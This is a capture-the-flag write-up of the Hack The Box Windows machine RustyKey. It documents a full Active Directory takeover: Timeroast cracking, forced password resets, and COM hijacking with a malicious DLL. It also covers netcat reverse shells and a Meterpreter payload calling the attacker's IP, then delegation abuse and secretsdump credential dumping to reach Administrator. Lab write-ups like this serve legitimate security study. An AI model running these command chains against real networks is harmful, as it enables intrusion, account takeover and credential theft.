> m4rt@CTF_ARCHIVE:~$

// ATTACHMENTS

Hack The Box / WINDOWS / 2026-03-18

Hack The Box — RustyKey (Windows)

Timeroast-based machine-account foothold, Helpdesk abuse and COM hijacking to pivot into delegation rights, then RBCD to impersonate backupadmin and reach Administrator.

Target

  • IP: 10.10.11.75

Machine information

As is common in real-life Windows penetration tests, you start the RustyKey box with credentials for the following account:

  • rr.parker / 8#t5HE8L!W3A

Recon

sudo nmap -sC -sV 10.10.11.75 -p- -T5 -v

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-02 03:39:56Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
52316/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Add rustykey.htb to /etc/hosts.

nxc smb 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A'

SMB         10.10.11.75  445    10.10.11.75   [*]  x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False)
SMB         10.10.11.75  445    10.10.11.75   [-] 10.10.11.75\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED

nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A'

LDAP        10.10.11.75  389    dc.rustykey.htb  [*]  x64 (name:dc.rustykey.htb) (domain:rustykey.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.75  389    dc.rustykey.htb  [-] rustykey.htb\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED

sudo ntpdate 10.10.11.75

Kerberos setup and initial enumeration

getTGT.py rustykey.htb/rr.parker:'8#t5HE8L!W3A' -dc-ip 10.10.11.75

[*] Saving ticket in rr.parker.ccache

export KRB5CCNAME='rr.parker.ccache'

nxc ldap 10.10.11.75 -d rustykey.htb -k --use-kcache

LDAP        10.10.11.75  389    dc.rustykey.htb  [*]  x64 (name:dc.rustykey.htb) (domain:rustykey.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.75  389    dc.rustykey.htb  [+] rustykey.htb\rr.parker from ccache

Add dc.rustykey.htb to /etc/hosts. Make sure it is the first name in the list, otherwise ldapsearch will not work.

nxc smb dc.rustykey.htb -d rustykey.htb -k --use-kcache --shares

SMB         dc.rustykey.htb 445    dc               [*]  x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:False)
SMB         dc.rustykey.htb 445    dc               [+] rustykey.htb\rr.parker from ccache
SMB         dc.rustykey.htb 445    dc               [*] Enumerated shares
SMB         dc.rustykey.htb 445    dc               Share           Permissions     Remark
SMB         dc.rustykey.htb 445    dc               -----           -----------     ------
SMB         dc.rustykey.htb 445    dc               ADMIN$                          Remote Admin
SMB         dc.rustykey.htb 445    dc               C$                              Default share
SMB         dc.rustykey.htb 445    dc               IPC$            READ            Remote IPC
SMB         dc.rustykey.htb 445    dc               NETLOGON        READ            Logon server share
SMB         dc.rustykey.htb 445    dc               SYSVOL          READ            Logon server share

There does not seem to be anything interesting at first glance.

Get user list:

nxc smb dc.rustykey.htb -d rustykey.htb -k --use-kcache --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users_2.txt

bloodhound-python -u rr.parker -k -no-pass -ns 10.10.11.75 -d 'rustykey.htb' -dc 'dc.rustykey.htb' -c All --zip

sudo bloodhound

Update /etc/krb5.conf with:

[realms]
  RUSTYKEY.HTB = {
    kdc = dc.rustykey.htb
    admin_server = dc.rustykey.htb
  }

[domain_realm]
  .rustykey.htb = RUSTYKEY.HTB
  rustykey.htb = RUSTYKEY.HTB

Timeroast and machine account compromise

Download Timeroast:

git clone https://github.com/SecuraBV/Timeroast.git
python3 Timeroast/timeroast.py dc.rustykey.htb

We get:

1000:$sntp-ms$9b51a244587577dfc03cf4c28393eeb2$1c0111e900000000000a1dd64c4f434cec15485539301648e1b8428bffbfcd0aec156faadd070fbeec156faadd072a96
1103:$sntp-ms$44ead8098411f81b0855a5c007919c6d$1c0111e900000000000a1dd64c4f434cec154855368c7efee1b8428bffbfcd0aec156fab9e7c0beaec156fab9e7c26c2
1104:$sntp-ms$893bc836176d1da9e16ab245eb360894$1c0111e900000000000a1dd64c4f434cec154855380619f5e1b8428bffbfcd0aec156fab9ff59ccfec156fab9ff5c6c1
1105:$sntp-ms$9bb97eb3332e1b24e1b789919b112891$1c0111e900000000000a1dd64c4f434cec154855388b5101e1b8428bffbfcd0aec156faba07aad45ec156faba07afa72
1106:$sntp-ms$5bc70ae04898d56ed10f414025d8f5a2$1c0111e900000000000a1dd64c4f434cec15485536821a21e1b8428bffbfcd0aec156faba248adeeec156faba248cc21
1107:$sntp-ms$6c24ab3b8ff86f4dc4ce30196b84c90c$1c0111e900000000000a1dd64c4f434cec15485536826aa8e1b8428bffbfcd0aec156faba2490024ec156faba2491e57
1118:$sntp-ms$fd0d4c988703ea259f5dc433de403b43$1c0111e900000000000a1dd64c4f434cec15485539488326e1b8428bffbfcd0aec156fabb52fdb8fec156fabb52ffb70
1119:$sntp-ms$d6e28ab96a8c60104a1ff0d1ac58b551$1c0111e900000000000a1dd64c4f434cec15485536ffc7cbe1b8428bffbfcd0aec156fabb6ffb1fcec156fabb6ffd38a
1120:$sntp-ms$78c03e927557a8dc91fbb94c70312e16$1c0111e900000000000a1dd64c4f434cec1548553805eca9e1b8428bffbfcd0aec156fabb805d52cec156fabb805f6ba
1121:$sntp-ms$71acb3577e691aa138b44369cfea2344$1c0111e900000000000a1dd64c4f434cec15485539952312e1b8428bffbfcd0aec156fabb9950d42ec156fabb9952ed0
1122:$sntp-ms$1edbb7fc14609ef9cfe06c50df2fccf9$1c0111e900000000000a1dd64c4f434cec15485537f6d9e6e1b8428bffbfcd0aec156fabbbcdd002ec156fabbbcdee34
1123:$sntp-ms$453f0a57e34050bf0210f9bf87c6050e$1c0111e900000000000a1dd64c4f434cec15485536576973e1b8428bffbfcd0aec156fabbe46f303ec156fabbe471136
1124:$sntp-ms$12090b679450a4ee9e34b3a6c46a297c$1c0111e900000000000a1dd64c4f434cec154855382012c4e1b8428bffbfcd0aec156fabc00f98faec156fabc00fbde3
1126:$sntp-ms$65f319fc2762fccd43427f023c6338e1$1c0111e900000000000a1dd64c4f434cec15485536a4de71e1b8428bffbfcd0aec156fabc26b6b88ec156fabc26b9071
1125:$sntp-ms$69166d5e9c9ce8b99d82c557ff108f73$1c0111e900000000000a1dd64c4f434cec15485536a29845e1b8428bffbfcd0aec156fabc26923b0ec156fabc2694da1
1127:$sntp-ms$6821b0c95ac112c4952c5b0b614db662$1c0111e900000000000a1dd64c4f434cec15485538630ec3e1b8428bffbfcd0aec156fabc4299377ec156fabc429c0c3

Put them in a file hash.

./hashcat/hashcat -a 0 -m 31300 ./hash ./rockyou.txt --username

Or:

./john/run/john --wordlist=./rockyou.txt hash

We get:

1125 --> Rusty88!

1125 corresponds to IT-Computer3$.

This can be found with ldapsearch or powerview.py.

Download powerview.py: - https://github.com/aniqfakhrul/powerview.py

python3 powerview.py/powerview.py rustykey.htb/rr.parker@dc.rustykey.htb --dc-ip 10.10.11.75 -k --no-pass
Get-DomainComputer

We also see this attribute:

msDS-SupportedEncryptionTypes     : RC4-HMAC

So the DC supports only rc4-hmac for Kerberos ticket requests.

getTGT.py rustykey.htb/'IT-Computer3$':'Rusty88!' -dc-ip 10.10.11.75

[*] Saving ticket in IT-Computer3$.ccache

export KRB5CCNAME='IT-Computer3$.ccache'

From BloodHound, IT-Computer3$ has an AddSelf relation to group helpdesk.

python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k add groupMember 'helpdesk' 'IT-Computer3$'

[+] IT-Computer3$ added to helpdesk

From BloodHound, helpdesk has:

  • ForceChangePassword over ee.reed, gg.anderson, bb.morgan, and dd.ali
  • GenericWrite over dd.ali
  • AddMember over group protected objects

protected objects contains:

  • Group IT, which contains bb.morgan and gg.anderson
  • Group support, which contains ee.reed

protected objects is part of protected users, which is a special Active Directory group with stricter security policies:

  • https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group

Very important: after adding IT-Computer3 to helpdesk, request a new ticket.

getTGT.py rustykey.htb/'IT-Computer3$':'Rusty88!' -dc-ip 10.10.11.75

[*] Saving ticket in IT-Computer3$.ccache

export KRB5CCNAME='IT-Computer3$.ccache'

Now we can change the passwords of the users listed above:

python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k set password 'ee.reed' '!Kali12345678!'

[+] Password changed successfully!

python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k set password 'gg.anderson' '!Kali12345678!'

[+] Password changed successfully!

python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k set password 'bb.morgan' '!Kali12345678!'

[+] Password changed successfully!

python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k set password 'dd.ali' '!Kali12345678!'

Here we get an error:

msldap.commons.exceptions.LDAPModifyException: Password can't be changed. It may be because the oldpass provided is not valid.
You can try to use another password change protocol such as smbpasswd, server error may be more explicit.

Instead, this works:

python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k set password 'dd.ali' 'Winter2025!'

Things that did not work

Since helpdesk has GenericWrite over dd.ali, we can try targetedKerberoast.

Download:

  • https://github.com/ShutdownRepo/targetedKerberoast
python3 targetedKerberoast/targetedKerberoast.py -v --dc-ip 10.10.11.75 --dc-host dc.rustykey.htb -d rustykey.htb -u 'IT-Computer3$' -k --no-pass

An hash is printed.

Put it in a file hash:

./hashcat-6.2.6/hashcat.bin -a 0 ./hash ./rockyou.txt

It does not crack.

We can also try pywhisker.

Download pywhisker:

git clone https://github.com/ShutdownRepo/pywhisker.git

python3 pywhisker/pywhisker/pywhisker.py -vv -d 'rustykey.htb' --dc-ip 10.10.11.75 --dc-host dc.rustykey.htb -d rustykey.htb -u 'IT-Computer3$' -k --no-pass --target dd.ali --action add

[+] PFX exportiert nach: bPBjjXCf.pfx
[i] Passwort für PFX: cQr3iHU2LeXuuN8LA1yC
[+] Saved PFX (#PKCS12) certificate & key at path: bPBjjXCf.pfx
[*] Must be used with password: cQr3iHU2LeXuuN8LA1yC
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

certipy cert -export -pfx bPBjjXCf.pfx -password cQr3iHU2LeXuuN8LA1yC -out "dd.ali.pfx"

[*] Data written to 'dd.ali.pfx'

certipy auth -dc-ip 10.10.11.75 -pfx dd.ali.pfx -username dd.ali -domain rustykey.htb

We get an error:

[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

Also, even with the -ldap-shell option, it does not work.

Access as bb.morgan and Support group path

Try requesting TGTs for users whose passwords were changed.

Problem:

  • with ee.reed and bb.morgan we get KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)

This seems to be because those users belong to protected users. Users in that group must use AES to request tickets, but as seen above the DC only supports rc4-hmac.

With gg.anderson we get:

  • KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

However, since IT-Computer3$ has AddMember to protected objects, we can remove group IT from protected objects.

export KRB5CCNAME='IT-Computer3$.ccache'

python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k remove groupMember 'protected objects' 'IT'

[-] IT removed from protected objects

Request TGT as bb.morgan:

getTGT.py rustykey.htb/'bb.morgan':'!Kali12345678!' -dc-ip 10.10.11.75

[*] Saving ticket in bb.morgan.ccache

export KRB5CCNAME='bb.morgan.ccache'

Since bb.morgan is in Remote Management Users, we can get a shell with Evil-WinRM:

evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB

We get a PowerShell shell, but it is unstable, so we switch to reverse shell with nc64.exe.

Upload nc64.exe to target:

  • https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe

Start listener:

rlwrap nc -vlnp 4444

On target machine:

.\nc64.exe -e cmd.exe 10.10.14.53 4444

We get reverse shell.

Get PowerShell:

powershell

On desktop there is internal.pdf.

Download it with smbserver.py.

On attacker machine:

smbserver.py -smb2support -username test12 -password test12 share $(pwd)

On target machine:

net use \\10.10.14.53\share test12 /USER:test12

cp internal.pdf \\10.10.14.53\share

Inside it we read:

From: bb.morgan@rustykey.htb
To: support-team@rustykey.htb
Subject: Support Group - Archiving Tool Access
Date: Mon, 10 Mar 2025 14:35:18 +0100

Hey team,
As part of the new Support utilities rollout, extended access has been temporarily granted to allow
testing and troubleshooting of file archiving features across shared workstations.
This is mainly to help streamline ticket resolution related to extraction/compression issues reported
by the Finance and IT teams. Some newer systems handle context menu actions differently, so
registry-level adjustments are expected during this phase.
A few notes:
- Please avoid making unrelated changes to system components while this access is active.
- This permission change is logged and will be rolled back once the archiving utility is confirmed
stable in all environments.
- Let DevOps know if you encounter access errors or missing shell actions.

Thanks,
BB Morgan
IT Department

This suggests support can modify registry keys. Likely a COM hijacking path.

Useful site:

  • https://specterops.io/blog/2025/05/28/revisiting-com-hijacking/

To identify registry keys writable by support, use accesschk64.exe.

Download:

  • https://download.sysinternals.com/files/AccessChk.zip

Extract and upload accesschk64.exe to the victim.

.\accesschk64.exe -accepteula -q -s -k HKLM\Software\Classes\CLSID | Select-String SUPPORT -Context 5,5

HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}
    R  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
>   RW RUSTYKEY\Support
    RW NT AUTHORITY\SYSTEM
    RW BUILTIN\Administrators
    R  BUILTIN\Users
  HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
    R  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
    RW BUILTIN\Administrators
>   RW RUSTYKEY\Support
    RW NT AUTHORITY\SYSTEM
    R  BUILTIN\Users

reg query 'HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}' /s

HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}
    (Default)    REG_SZ    7-Zip Shell Extension

HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
    (Default)    REG_SZ    C:\Program Files\7-Zip\7-zip.dll
    ThreadingModel    REG_SZ    Apartment

Since ee.reed is in support, we need a shell as ee.reed.

IT-Computer3$ can change that password.

Use its ticket:

export KRB5CCNAME='IT-Computer3$.ccache'

python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k set password 'ee.reed' '!Kali12345678!'

[+] Password changed successfully!

Remove group support from protected objects (and therefore from protected users):

python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k remove groupMember 'protected objects' 'support'

[-] support removed from protected objects

Download RunasCs and upload to victim:

  • https://github.com/antonioCoco/RunasCs

Start netcat listener:

rlwrap nc -vlnp 4444

On victim:

.\RunasCs.exe 'ee.reed' '!Kali12345678!' "C:\tmp\nc64.exe -e cmd.exe 10.10.14.53 4444"

We get reverse shell as ee.reed.

Get PowerShell:

powershell

COM hijacking to mm.turner

Now we need to create a malicious DLL.

See attached file hijack.cpp.

First, check whether we have RCE by running this command:

system("curl http://10.10.14.53:7777/pwnd");

sudo apt install g++-mingw-w64-x86-64

x86_64-w64-mingw32-g++ -shared -o hijack.dll hijack.cpp

Upload DLL to C:\tmp.

Start listener:

python3 -m http.server 7777

In PowerShell shell:

reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\tmp\hijack.dll" /f

The operation completed successfully.

Wait. In python server terminal we get:

10.10.11.75 - - [10/Jul/2025 22:10:34] "GET /pwnd HTTP/1.1" 404 -

We have RCE, so we can get a reverse shell.

Use command:

system("C:\\tmp\\nc64.exe -e cmd.exe 10.10.14.53 4444");

Recompile DLL and upload it to victim.

Start netcat listener:

rlwrap nc -vlnp 4444

Modify the registry key again with the same command as above.

Wait. We get a reverse shell.

whoami

rustykey\mm.turner

We are now user mm.turner.

Delegation abuse and domain compromise

From BloodHound, mm.turner is in group delegationmanager, which has AddAllowedToAct over the domain controller.

Follow BloodHound instructions.

We should create a machine account.

Download Powermad and upload to victim:

  • https://github.com/Kevin-Robertson/Powermad/raw/refs/heads/master/Powermad.ps1
. .\Powermad.ps1

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

We get error:

[-] Exception calling "SendRequest" with "1" argument(s): "The server cannot handle directory requests."

This is likely due to:

whoami /priv

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

The privilege to add machine accounts is disabled.

We can try enabling it with Metasploit.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o reverse.exe

Upload reverse.exe to victim.

On attacker machine:

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
run

On victim:

.\reverse.exe

We get reverse Meterpreter.

getprivs
shell

whoami /priv

Now SeMachineAccountPrivilege is enabled.

powershell
. .\Powermad.ps1

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force) -Domain rustykey.htb -DomainController dc.rustykey.htb -Verbose

Still not working.

If we check the quota:

Get-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'

ms-ds-machineaccountquota
-------------------------
                        0

It is 0, so users cannot add machine accounts.

So BloodHound default instructions do not work here.

From this site:

  • https://www.thehacker.recipes/ad/movement/dacl/

We note:

  • AddAllowedToAct, a write permission on an object's msDS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute, for Kerberos RBCD attacks

Useful site:

  • https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd

So we can perform Resource-Based Constrained Delegation (RBCD).

In mm.turner shell:

Set-ADComputer 'DC' -PrincipalsAllowedToDelegateToAccount 'IT-Computer3$'

Verify:

Get-ADComputer 'DC' -Properties PrincipalsAllowedToDelegateToAccount

getST.py -spn 'cifs/dc.rustykey.htb' -impersonate 'backupadmin' -dc-ip 10.10.11.75 -k -no-pass rustykey.htb/'IT-Computer3$':'Rusty88!'

[*] Saving ticket in backupadmin@cifs_dc.rustykey.htb@RUSTYKEY.HTB.ccache

export KRB5CCNAME='backupadmin@cifs_dc.rustykey.htb@RUSTYKEY.HTB.ccache'

nxc smb dc.rustykey.htb -d rustykey.htb -k --use-kcache

SMB         dc.rustykey.htb 445    dc               [*]  x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.rustykey.htb 445    dc               [+] rustykey.htb\backupadmin from ccache (Pwn3d!)

backupadmin is part of Enterprise Admins.

secretsdump.py -k -no-pass 'rustykey.htb'/'backupadmin'@'dc.rustykey.htb'

Among the hashes, we find Administrator:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7a351e12f70cc177a1d5bd11b28ac26:::

getTGT.py rustykey.htb/'Administrator' -hashes ':f7a351e12f70cc177a1d5bd11b28ac26' -dc-ip 10.10.11.75

[*] Saving ticket in Administrator.ccache

export KRB5CCNAME='Administrator.ccache'

evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB

We get a shell as Administrator.

Useful notes

Kerberos-authenticated ldapsearch:

ldapsearch -Y GSSAPI -H ldap://dc.rustykey.htb -b "dc=rustykey,dc=htb" "(objectClass=person)" description

Obtain an rc4-hmac ticket:

ktutil
addent -password -p IT-Computer3$@RUSTYKEY.HTB -k 1 -e rc4-hmac
# enter password
wkt itcomp3.keytab
quit

A file itcomp3.keytab is created.

export KRB5CCNAME=/tmp/krb5cc_itcomp3
kinit -k -t itcomp3.keytab 'IT-Computer3$@RUSTYKEY.HTB'

We get the ticket.

We can access shares with smbclient:

smbclient -k '//dc.rustykey.htb/IPC$'

Note

Strangely, this did not work:

export KRB5CCNAME='IT-Computer3$.ccache'
smbclient -k '//dc.rustykey.htb/IPC$'

Using the ticket obtained with kinit, we can also change passwords, for example:

net rpc password "dd.ali" 'Winter2025!' -k -S "dc.rustykey.htb"